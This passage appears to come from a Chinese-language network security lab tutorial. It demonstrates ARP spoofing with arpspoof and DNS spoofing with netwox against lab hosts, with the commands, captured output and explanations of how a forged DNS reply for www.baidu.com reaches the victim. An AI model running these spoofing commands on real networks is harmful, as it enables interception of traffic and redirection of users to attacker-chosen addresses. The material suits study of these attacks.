[email protected]:~# arpspoof -i eth0 -t 192.168.59.135 192.168.59.2
該命令表示對主機 B 實施 ARP 攻擊,偽造的是閘道器 192.168.59.2。執行命令後輸出資訊如下:
0:c:29:fd:de:b8 0:c:29:ca:e4:66 0806 42: arp reply 192.168.59.2 is-at
0:c:29:fd:de:b8
0:c:29:fd:de:b8 0:c:29:ca:e4:66 0806 42: arp reply 192.168.59.2 is-at
0:c:29:fd:de:b8
0:c:29:fd:de:b8 0:c:29:ca:e4:66 0806 42: arp reply 192.168.59.2 is-at
0:c:29:fd:de:b8
0:c:29:fd:de:b8 0:c:29:ca:e4:66 0806 42: arp reply 192.168.59.2 is-at
0:c:29:fd:de:b8
··· #省略其他資訊
[email protected]:~# netwox 105 -h www.baidu.com -H 101.102.103.104 -a 123.baidu.com -A 55.66.77.88
執行命令後,沒有輸出資訊。因為主機 B 沒有產生 DNS 請求。[email protected]:~# netwox 105 -h www.baidu.com -H 101.102.103.104 -a 123.baidu.com -A 55.66.77.88 DNS_question_______________________________________________. #DNS請求 | id=22684 rcode=OK opcode=QUERY | | aa=0 tr=0 rd=1 ra=0 quest=1 answer=0 auth=0 add=0 | | www.baidu.com. A | |__________________________________________________________ | DNS_answer________________________________________________. #DNS響應 | id=22684 rcode=OK opcode=QUERY | | aa=1 tr=0 rd=1 ra=1 quest=1 answer=1 auth=1 add=1 | | www.baidu.com. A | | www.baidu.com. A 10 101.102.103.104 | | 123.baidu.com. NS 10 123.baidu.com. | | 123.baidu.com. A 10 55.66.77.88 | |__________________________________________________________ |其中,DNS_question 部分為監聽到的主機 B 傳送的 www.baidu.com (http://www.baidu.com) 的 DNS 請求包資訊,DNS_answer 部分為主機 A 偽造的 DNS 響應資訊,成功返給了主機 B。